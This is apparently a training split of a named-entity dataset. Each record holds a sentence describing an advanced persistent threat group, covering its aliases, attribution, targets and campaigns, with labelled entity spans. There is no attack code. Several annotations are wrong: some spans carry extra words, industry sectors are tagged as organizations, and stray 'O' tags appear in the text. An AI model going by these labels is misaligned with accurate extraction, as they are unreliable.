{"text": "Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002625", "source": "aptner_train"}}
{"text": "Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": {"Organization: Scarlet Mimic": [[0, 13]]}, "info": {"id": "aptner_train_002626", "source": "aptner_train"}}
{"text": "This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": {"Organization: Chinese government": [[130, 148]]}, "info": {"id": "aptner_train_002627", "source": "aptner_train"}}
{"text": "While there is some overlap between IP addresses used by Scarlet Mimic Panda , it has not been concluded that the groups are the same .", "spans": {"Organization: by Scarlet Mimic": [[54, 70]]}, "info": {"id": "aptner_train_002628", "source": "aptner_train"}}
{"text": "Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": {"Organization: Silence": [[0, 7]]}, "info": {"id": "aptner_train_002629", "source": "aptner_train"}}
{"text": "The group was first seen in June 2016 .", "spans": {}, "info": {"id": "aptner_train_002630", "source": "aptner_train"}}
{"text": "Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": {}, "info": {"id": "aptner_train_002631", "source": "aptner_train"}}
{"text": "They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": {}, "info": {"id": "aptner_train_002632", "source": "aptner_train"}}
{"text": "Threat Group-1314 : TG-1314 .", "spans": {"Organization: Threat Group-1314": [[0, 17]], "Organization: TG-1314": [[20, 27]]}, "info": {"id": "aptner_train_002633", "source": "aptner_train"}}
{"text": "Threat Group-1314 is an unattributed threat group that has used", "spans": {"Organization: Threat Group-1314": [[0, 17]]}, "info": {"id": "aptner_train_002634", "source": "aptner_train"}}
{"text": "compromised credentials to log into a victim ’s remote access infrastructure .", "spans": {}, "info": {"id": "aptner_train_002635", "source": "aptner_train"}}
{"text": "Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": {"Organization: Threat Group-3390": [[0, 17]], "Organization: TG-3390": [[20, 27]], "Organization: ,Emissary Panda": [[28, 43]], "Organization: BRONZE UNION": [[46, 58]], "Organization: APT27": [[61, 66]], "Organization: Iron Tiger": [[69, 79]], "Organization: LuckyMouse": [[82, 92]]}, "info": {"id": "aptner_train_002636", "source": "aptner_train"}}
{"text": "Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": {"Organization: Threat Group-3390": [[0, 17]]}, "info": {"id": "aptner_train_002637", "source": "aptner_train"}}
{"text": "The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology ,O energy , and manufacturing sectors .", "spans": {"Organization: aerospace": [[84, 93]], "Organization: government": [[96, 106]], "Organization: defense": [[109, 116]], "Organization: technology": [[119, 129]], "Organization: energy": [[133, 139]], "Organization: manufacturing sectors": [[146, 167]]}, "info": {"id": "aptner_train_002638", "source": "aptner_train"}}
{"text": "Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. and Southeast Asia .", "spans": {"Organization: Thrip": [[0, 5]]}, "info": {"id": "aptner_train_002639", "source": "aptner_train"}}
{"text": "The group uses custom malware as well as “ living off the land ” techniques .", "spans": {}, "info": {"id": "aptner_train_002640", "source": "aptner_train"}}
{"text": "NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"Organization: NEODYMIUM": [[0, 9]]}, "info": {"id": "aptner_train_002641", "source": "aptner_train"}}
{"text": "The group has demonstrated similarity to another activity group called O PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": {"Organization: PROMETHIUM": [[73, 83]]}, "info": {"id": "aptner_train_002642", "source": "aptner_train"}}
{"text": "NEODYMIUM is reportedly associated closely with O BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: NEODYMIUM": [[0, 9]], "Organization: BlackOasis": [[50, 60]]}, "info": {"id": "aptner_train_002643", "source": "aptner_train"}}
{"text": "Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": {"Organization: Night Dragon": [[0, 12]]}, "info": {"id": "aptner_train_002644", "source": "aptner_train"}}
{"text": "OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": {"Organization: OilRig": [[0, 6]], "Organization: IRN2": [[9, 13]], "Organization: HELIX KITTEN": [[16, 28]], "Organization: APT34": [[31, 36]]}, "info": {"id": "aptner_train_002645", "source": "aptner_train"}}
{"text": "OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014 .", "spans": {"Organization: OilRig": [[0, 6]]}, "info": {"id": "aptner_train_002646", "source": "aptner_train"}}
{"text": "The group has targeted a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": {"Organization: financial": [[59, 68]], "Organization: government": [[71, 81]], "Organization: energy": [[84, 90]], "Organization: chemical": [[93, 101]], "Organization: telecommunications": [[108, 126]]}, "info": {"id": "aptner_train_002647", "source": "aptner_train"}}
{"text": "It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": {}, "info": {"id": "aptner_train_002648", "source": "aptner_train"}}
{"text": "FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: Iranian government": [[55, 73]]}, "info": {"id": "aptner_train_002649", "source": "aptner_train"}}
{"text": "This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": {"Organization: APT34": [[62, 67]], "Organization: OilRig": [[72, 78]]}, "info": {"id": "aptner_train_002650", "source": "aptner_train"}}
{"text": "APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002651", "source": "aptner_train"}}
{"text": "APT17 : Deputy Dog .", "spans": {"Organization: APT17": [[0, 5]], "Organization: Deputy Dog": [[8, 18]]}, "info": {"id": "aptner_train_002652", "source": "aptner_train"}}
{"text": "APT17 is a China based threat group that has conducted network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: APT17": [[0, 5]], "Organization: law firms": [[132, 141]], "Organization: information technology companies": [[144, 176]], "Organization: mining companies": [[179, 195]]}, "info": {"id": "aptner_train_002653", "source": "aptner_train"}}
{"text": "APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": {"Organization: APT18": [[0, 5]], "Organization: TG-0416": [[8, 15]], "Organization: Dynamite Panda": [[18, 32]], "Organization: Threat Group-0416": [[35, 52]]}, "info": {"id": "aptner_train_002654", "source": "aptner_train"}}
{"text": "APT18 a threat group that has operated since at least 2009 and has targeted a range of industries , including technology , manufacturing , human rights groups , government , and medical .", "spans": {"Organization: APT18": [[0, 5]]}, "info": {"id": "aptner_train_002655", "source": "aptner_train"}}
{"text": "Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": {"Organization: Group5": [[0, 6]]}, "info": {"id": "aptner_train_002656", "source": "aptner_train"}}
{"text": "The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": {}, "info": {"id": "aptner_train_002657", "source": "aptner_train"}}
{"text": "Group5 has used two commonly available remote access tools ( RATs ) , njRAT , as well as an Android RAT , DroidJack .", "spans": {"Organization: Group5": [[0, 6]], "Malware: remote access tools": [[39, 58]], "Malware: RATs": [[61, 65]], "Malware: , njRAT": [[68, 75]], "Malware: Android RAT": [[92, 103]], "Malware: DroidJack": [[106, 115]]}, "info": {"id": "aptner_train_002658", "source": "aptner_train"}}
{"text": "Honeybee is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {}, "info": {"id": "aptner_train_002659", "source": "aptner_train"}}
{"text": "It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": {}, "info": {"id": "aptner_train_002660", "source": "aptner_train"}}
{"text": "Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": {"Organization: Group7": [[0, 6]], "Organization: APT15": [[9, 14]], "Organization: Mirage": [[17, 23]], "Organization: Vixen Panda": [[26, 37]], "Organization: GREF": [[40, 44]], "Organization: Playful Dragon": [[47, 61]], "Organization: RoyalAPT": [[64, 72]]}, "info": {"id": "aptner_train_002661", "source": "aptner_train"}}
{"text": "Ke3chang  is a threat group attributed to actors operating out of China .", "spans": {"Organization: Ke3chang ": [[0, 9]]}, "info": {"id": "aptner_train_002662", "source": "aptner_train"}}
{"text": "Ke3chang  has targeted several industries , including oil , government , military , and more .", "spans": {"Organization: Ke3chang ": [[0, 9]]}, "info": {"id": "aptner_train_002663", "source": "aptner_train"}}
{"text": "Kimsuky : Velvet Chollima .", "spans": {"Organization: Kimsuky": [[0, 7]], "Organization: Velvet Chollima": [[10, 25]]}, "info": {"id": "aptner_train_002664", "source": "aptner_train"}}
{"text": "Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": {"Organization: Kimsuky": [[0, 7]]}, "info": {"id": "aptner_train_002665", "source": "aptner_train"}}
{"text": "The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": {"Organization: Korean think tank": [[31, 48]], "Organization: DPRK/nuclear-related": [[60, 80]]}, "info": {"id": "aptner_train_002666", "source": "aptner_train"}}
{"text": "The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise .", "spans": {"Organization: Korea Hydro & Nuclear Power Co.compromise": [[49, 90]]}, "info": {"id": "aptner_train_002667", "source": "aptner_train"}}
{"text": "Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": {"Organization: Lazarus Group": [[0, 13]], "Organization: HIDDEN COBRA": [[16, 28]], "Organization: Guardians of Peace": [[31, 49]], "Organization: ZINC": [[52, 56]], "Organization: NICKEL ACADEMY": [[59, 73]]}, "info": {"id": "aptner_train_002668", "source": "aptner_train"}}
{"text": "Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": {"Organization: Lazarus Group": [[0, 13]], "Organization: North Korean government": [[64, 87]]}, "info": {"id": "aptner_train_002669", "source": "aptner_train"}}
{"text": "The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": {"Organization: Sony Pictures Entertainment": [[132, 159]], "Organization: Novetta": [[213, 220]]}, "info": {"id": "aptner_train_002670", "source": "aptner_train"}}
{"text": "Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": {"Organization: Lazarus Group": [[16, 29]], "Malware: Operation Flame": [[81, 96]], "Malware: Operation 1Mission": [[99, 117]], "Malware: Operation Troy": [[120, 134]], "Malware: DarkSeoul": [[137, 146]], "Malware: Ten Days of Rain": [[153, 169]]}, "info": {"id": "aptner_train_002671", "source": "aptner_train"}}
{"text": "In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": {"Organization: Lazarus Group": [[15, 28]], "Malware: KillDisk": [[34, 42]]}, "info": {"id": "aptner_train_002672", "source": "aptner_train"}}
{"text": "North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": {"Organization: Lazarus Group": [[84, 97]]}, "info": {"id": "aptner_train_002673", "source": "aptner_train"}}
{"text": "Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": {"Organization: Lazarus Group": [[32, 45]]}, "info": {"id": "aptner_train_002674", "source": "aptner_train"}}
{"text": "Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": {"Organization: Bluenoroff": [[65, 75]], "Organization: APT37": [[78, 83]], "Organization: APT38": [[90, 95]], "Organization: Lazarus Group": [[205, 218]]}, "info": {"id": "aptner_train_002675", "source": "aptner_train"}}
{"text": "Leafminer : Raspite .", "spans": {"Organization: Leafminer": [[0, 9]], "Organization: Raspite": [[12, 19]]}, "info": {"id": "aptner_train_002676", "source": "aptner_train"}}
{"text": "Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017 .", "spans": {"Organization: Leafminer": [[0, 9]], "Organization: Middle East": [[109, 120]]}, "info": {"id": "aptner_train_002677", "source": "aptner_train"}}
{"text": "Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": {"Organization: Elderwood": [[0, 9]], "Organization: Elderwood Gang": [[12, 26]], "Organization: Beijing Group": [[29, 42]], "Organization: Sneaky Panda": [[45, 57]]}, "info": {"id": "aptner_train_002678", "source": "aptner_train"}}
{"text": "The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": {"Organization: defense organizations": [[23, 44]]}, "info": {"id": "aptner_train_002680", "source": "aptner_train"}}
{"text": "Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": {"Organization: Equation": [[0, 8]], "Malware: remote access tools": [[63, 82]]}, "info": {"id": "aptner_train_002681", "source": "aptner_train"}}
{"text": "The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]]}, "info": {"id": "aptner_train_002682", "source": "aptner_train"}}
{"text": "FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016 .", "spans": {"Organization: FIN10": [[0, 5]]}, "info": {"id": "aptner_train_002683", "source": "aptner_train"}}
{"text": "The group uses stolen data exfiltrated from victims to extort organizations .", "spans": {}, "info": {"id": "aptner_train_002684", "source": "aptner_train"}}
{"text": "Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": {"Organization: Patchwork": [[0, 9]], "Organization: Dropping Elephant": [[12, 29]], "Organization: Chinastrats": [[32, 43]], "Organization: MONSOON": [[46, 53]], "Organization: Operation Hangover": [[56, 74]]}, "info": {"id": "aptner_train_002686", "source": "aptner_train"}}
{"text": "Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_002687", "source": "aptner_train"}}
{"text": "While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": {}, "info": {"id": "aptner_train_002688", "source": "aptner_train"}}
{"text": "Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": {"Organization: Patchwork": [[0, 9]], "Organization: diplomatic": [[56, 66]], "Organization: government agencies": [[71, 90]]}, "info": {"id": "aptner_train_002689", "source": "aptner_train"}}
{"text": "Much of the code used by this group was copied and pasted from online forums .", "spans": {}, "info": {"id": "aptner_train_002690", "source": "aptner_train"}}
{"text": "Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_002691", "source": "aptner_train"}}
{"text": "PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": {"Organization: PittyTiger": [[0, 10]]}, "info": {"id": "aptner_train_002692", "source": "aptner_train"}}
{"text": "Unknown .", "spans": {}, "info": {"id": "aptner_train_002693", "source": "aptner_train"}}
{"text": "Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 ： Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": {"Organization: APT19": [[68, 73]], "Organization: Codoso": [[76, 82]], "Organization: C0d0so0": [[85, 92]], "Organization: Codoso Team": [[95, 106]], "Organization: Sunshop Group": [[109, 122]]}, "info": {"id": "aptner_train_002694", "source": "aptner_train"}}
{"text": "APT19 a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": {"Organization: APT19": [[0, 5]]}, "info": {"id": "aptner_train_002695", "source": "aptner_train"}}
{"text": "In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": {}, "info": {"id": "aptner_train_002696", "source": "aptner_train"}}
{"text": "Some analysts track APT19 Panda the same group , but it is unclear from open source information if the groups are the same .", "spans": {"Organization: track APT19": [[14, 25]]}, "info": {"id": "aptner_train_002697", "source": "aptner_train"}}
{"text": "APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": {"Organization: APT28": [[0, 5]], "Organization: SNAKEMACKEREL": [[8, 21]], "Organization: Swallowtail": [[24, 35]], "Organization: Group 74": [[38, 46]], "Organization: Sednit": [[49, 55]], "Organization: Sofacy": [[58, 64]], "Organization: Pawn Storm": [[67, 77]], "Organization: Fancy Bear": [[80, 90]], "Organization: STRONTIUM": [[93, 102]], "Organization: Tsar Team": [[105, 114]], "Organization: Threat Group-4127": [[117, 134]], "Organization: TG-4127": [[137, 144]]}, "info": {"id": "aptner_train_002698", "source": "aptner_train"}}
{"text": "APT28 a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"Organization: APT28": [[0, 5]], "Organization: Russia's Main Intelligence Directorate of the Russian General Staff": [[49, 116]], "Organization: U.S. Department of Justice": [[132, 158]]}, "info": {"id": "aptner_train_002699", "source": "aptner_train"}}
{"text": "This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election .", "spans": {"Organization: Democratic National Committee": [[69, 98]], "Organization: Democratic Congressional Campaign Committee": [[109, 152]]}, "info": {"id": "aptner_train_002700", "source": "aptner_train"}}
{"text": "APT28 has been active since at least 2004 .", "spans": {"Organization: APT28": [[0, 5]]}, "info": {"id": "aptner_train_002701", "source": "aptner_train"}}
{"text": "APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": {"Organization: APT29": [[0, 5]], "Organization: YTTRIUM": [[8, 15]], "Organization: The Dukes": [[18, 27]], "Organization: Cozy Bear": [[30, 39]], "Organization: CozyDuke": [[42, 50]]}, "info": {"id": "aptner_train_002702", "source": "aptner_train"}}
{"text": "APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": {"Organization: APT29": [[0, 5]], "Organization: Russian government": [[54, 72]]}, "info": {"id": "aptner_train_002703", "source": "aptner_train"}}
{"text": "This group reportedly compromised the Democratic National Committee starting in the summer of 2015 .", "spans": {"Organization: Democratic National Committee": [[38, 67]]}, "info": {"id": "aptner_train_002704", "source": "aptner_train"}}
{"text": "PLATINUM is an activity group that has targeted victims since at least 2009 .", "spans": {"Organization: PLATINUM": [[0, 8]]}, "info": {"id": "aptner_train_002705", "source": "aptner_train"}}
{"text": "The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": {"Organization: governments": [[49, 60]], "Organization: organizations": [[73, 86]]}, "info": {"id": "aptner_train_002706", "source": "aptner_train"}}
{"text": "Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": {"Organization: Poseidon Group": [[0, 14]]}, "info": {"id": "aptner_train_002707", "source": "aptner_train"}}
{"text": "The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": {"Organization: Poseidon Group": [[121, 135]]}, "info": {"id": "aptner_train_002708", "source": "aptner_train"}}
{"text": "The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {}, "info": {"id": "aptner_train_002710", "source": "aptner_train"}}
{"text": "PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": {"Organization: PROMETHIUM": [[0, 10]], "Organization: NEODYMIUM": [[72, 81]]}, "info": {"id": "aptner_train_002711", "source": "aptner_train"}}
{"text": "APT33 ：O Elfin APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": {"Organization: APT33": [[0, 5], [15, 20]], "Organization: Elfin": [[9, 14]]}, "info": {"id": "aptner_train_002712", "source": "aptner_train"}}
{"text": "The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": {}, "info": {"id": "aptner_train_002713", "source": "aptner_train"}}
{"text": "APT37 ：O ScarCruft , Reaper , Group123 , TEMP.Reaper APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": {"Organization: APT37": [[0, 5], [53, 58]], "Organization: ScarCruft": [[9, 18]], "Organization: Reaper": [[21, 27]], "Organization: Group123": [[30, 38]], "Organization: TEMP.Reaper": [[41, 52]]}, "info": {"id": "aptner_train_002714", "source": "aptner_train"}}
{"text": "The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": {}, "info": {"id": "aptner_train_002715", "source": "aptner_train"}}
{"text": "APT37 has also been linked to following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": {"Organization: APT37": [[0, 5]]}, "info": {"id": "aptner_train_002716", "source": "aptner_train"}}
{"text": "APT38 ：O APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": {"Organization: APT38": [[0, 5], [9, 14]]}, "info": {"id": "aptner_train_002717", "source": "aptner_train"}}
{"text": "The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014 . APT3 : Gothic Panda , Pirpi , UPS Team , Buckeye , Threat Group-0110 , TG-0110 .", "spans": {"Organization: APT3": [[149, 153]], "Organization: Gothic Panda": [[156, 168]], "Organization: Pirpi": [[171, 176]], "Organization: UPS Team": [[179, 187]], "Organization: Buckeye": [[190, 197]], "Organization: Threat Group-0110": [[200, 217]], "Organization: TG-0110": [[220, 227]]}, "info": {"id": "aptner_train_002718", "source": "aptner_train"}}
{"text": "APT3 is a China based threat group that researchers have attributed to China's Ministry of StateSecurity .", "spans": {"Organization: APT3": [[0, 4]], "Organization: China's Ministry of StateSecurity": [[71, 104]]}, "info": {"id": "aptner_train_002719", "source": "aptner_train"}}
{"text": "This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": {}, "info": {"id": "aptner_train_002720", "source": "aptner_train"}}
{"text": "As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": {}, "info": {"id": "aptner_train_002721", "source": "aptner_train"}}
{"text": "MITRE has also developed an APT3 Adversary Emulation Plan .", "spans": {"Organization: MITRE": [[0, 5]], "Organization: APT3": [[28, 32]]}, "info": {"id": "aptner_train_002722", "source": "aptner_train"}}
{"text": "APT30 is a threat group suspected to be associated with the Chinese government .", "spans": {"Organization: APT30": [[0, 5]], "Organization: Chinese government": [[60, 78]]}, "info": {"id": "aptner_train_002723", "source": "aptner_train"}}
{"text": "While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"Organization: Naikon": [[6, 12]], "Organization: APT30": [[46, 51]]}, "info": {"id": "aptner_train_002724", "source": "aptner_train"}}
{"text": "APT32 : SeaLotus , OceanLotus , APT-C-00 .", "spans": {"Organization: APT32": [[0, 5]], "Organization: SeaLotus": [[8, 16]], "Organization: OceanLotus": [[19, 29]], "Organization: APT-C-00": [[32, 40]]}, "info": {"id": "aptner_train_002725", "source": "aptner_train"}}
{"text": "APT32 is a threat group that has been active since at least 2014 .", "spans": {"Organization: APT32": [[0, 5]]}, "info": {"id": "aptner_train_002726", "source": "aptner_train"}}
{"text": "The group has targeted multiple private sector industries as well as with foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": {}, "info": {"id": "aptner_train_002727", "source": "aptner_train"}}
{"text": "They have extensively used strategic web compromises to compromise victims .", "spans": {"System: strategic web compromises": [[27, 52]]}, "info": {"id": "aptner_train_002728", "source": "aptner_train"}}
{"text": "The group is believed to be Vietnam based .", "spans": {}, "info": {"id": "aptner_train_002729", "source": "aptner_train"}}
{"text": "FIN7 : Carbanak Group .", "spans": {"Organization: FIN7": [[0, 4]], "Organization: Carbanak Group": [[7, 21]]}, "info": {"id": "aptner_train_002730", "source": "aptner_train"}}
{"text": "FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002731", "source": "aptner_train"}}
{"text": "They often use point-of-sale malware .", "spans": {"System: point-of-sale": [[15, 28]]}, "info": {"id": "aptner_train_002732", "source": "aptner_train"}}
{"text": "A portion of FIN7 was run out of a front company called Combi Security .", "spans": {"Organization: FIN7": [[13, 17]], "Organization: Combi Security": [[56, 70]]}, "info": {"id": "aptner_train_002733", "source": "aptner_train"}}
{"text": "FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"Organization: FIN7": [[0, 4]], "Organization: Carbanak Group": [[33, 47]], "Malware: Carbanak": [[99, 107]]}, "info": {"id": "aptner_train_002734", "source": "aptner_train"}}
{"text": "FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": {"Organization: FIN8": [[0, 4]]}, "info": {"id": "aptner_train_002735", "source": "aptner_train"}}
{"text": "Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": {"Organization: Gallmaker": [[0, 9]]}, "info": {"id": "aptner_train_002736", "source": "aptner_train"}}
{"text": "The group has mainly targeted victims in the defense , military , and government sectors .", "spans": {}, "info": {"id": "aptner_train_002737", "source": "aptner_train"}}
{"text": "DarkHydrus  is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": {"Organization: DarkHydrus ": [[0, 11]]}, "info": {"id": "aptner_train_002738", "source": "aptner_train"}}
{"text": "The group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": {}, "info": {"id": "aptner_train_002739", "source": "aptner_train"}}
{"text": "Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": {"Organization: Deep Panda": [[0, 10]], "Organization: Shell Crew": [[13, 23]], "Organization: WebMasters": [[26, 36]], "Organization: KungFu Kittens": [[39, 53]], "Organization: PinkPanther": [[56, 67]], "Organization: Black Vine": [[70, 80]]}, "info": {"id": "aptner_train_002740", "source": "aptner_train"}}
{"text": "Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": {"Organization: Deep Panda": [[0, 10]]}, "info": {"id": "aptner_train_002741", "source": "aptner_train"}}
{"text": "The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": {"Organization: Anthem": [[38, 44]], "Organization: to Deep Panda": [[65, 78]]}, "info": {"id": "aptner_train_002742", "source": "aptner_train"}}
{"text": "This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": {"Organization: Shell Crew": [[28, 38]], "Organization: WebMasters": [[41, 51]], "Organization: KungFu Kittens": [[54, 68]], "Organization: PinkPanther": [[75, 86]]}, "info": {"id": "aptner_train_002743", "source": "aptner_train"}}
{"text": "Deep Panda appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": {"Organization: Deep Panda": [[0, 10]], "Organization: Black Vine": [[34, 44]], "Organization: Anthem": [[97, 103]]}, "info": {"id": "aptner_train_002744", "source": "aptner_train"}}
{"text": "Some analysts track Deep Panda and O APT19 S-APT as the same group , but it is unclear from open source information if the groups are the same .", "spans": {"Organization: track Deep Panda": [[14, 30]]}, "info": {"id": "aptner_train_002745", "source": "aptner_train"}}
{"text": "Dragonfly : Energetic Bear .", "spans": {"Organization: Dragonfly": [[0, 9]], "Organization: Energetic Bear": [[12, 26]]}, "info": {"id": "aptner_train_002746", "source": "aptner_train"}}
{"text": "Dragonfly  is a cyber espionage group that has been active since at least 2011 .", "spans": {"Organization: Dragonfly ": [[0, 10]]}, "info": {"id": "aptner_train_002747", "source": "aptner_train"}}
{"text": "They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": {}, "info": {"id": "aptner_train_002748", "source": "aptner_train"}}
{"text": "They have also targeted companies related to industrial control systems .", "spans": {}, "info": {"id": "aptner_train_002749", "source": "aptner_train"}}
{"text": "A similar group emerged in 2015 and was identified by Symantec as O Dragonfly 2.0 .", "spans": {"Organization: Symantec": [[54, 62]], "Organization: Dragonfly 2.0": [[68, 81]]}, "info": {"id": "aptner_train_002750", "source": "aptner_train"}}
{"text": "There is debate over the extent of the overlap between O Dragonfly S-APT and O Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"Organization: Dragonfly 2.0": [[79, 92]]}, "info": {"id": "aptner_train_002751", "source": "aptner_train"}}
{"text": "Dragonfly 2.0 : Berserk Bear .", "spans": {"Organization: Dragonfly 2.0": [[0, 13]], "Organization: Berserk Bear": [[16, 28]]}, "info": {"id": "aptner_train_002752", "source": "aptner_train"}}
{"text": "There is debate over the extent of overlap between O Dragonfly 2.0 and O Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"Organization: Dragonfly 2.0": [[53, 66]], "Organization: Dragonfly": [[73, 82]]}, "info": {"id": "aptner_train_002754", "source": "aptner_train"}}
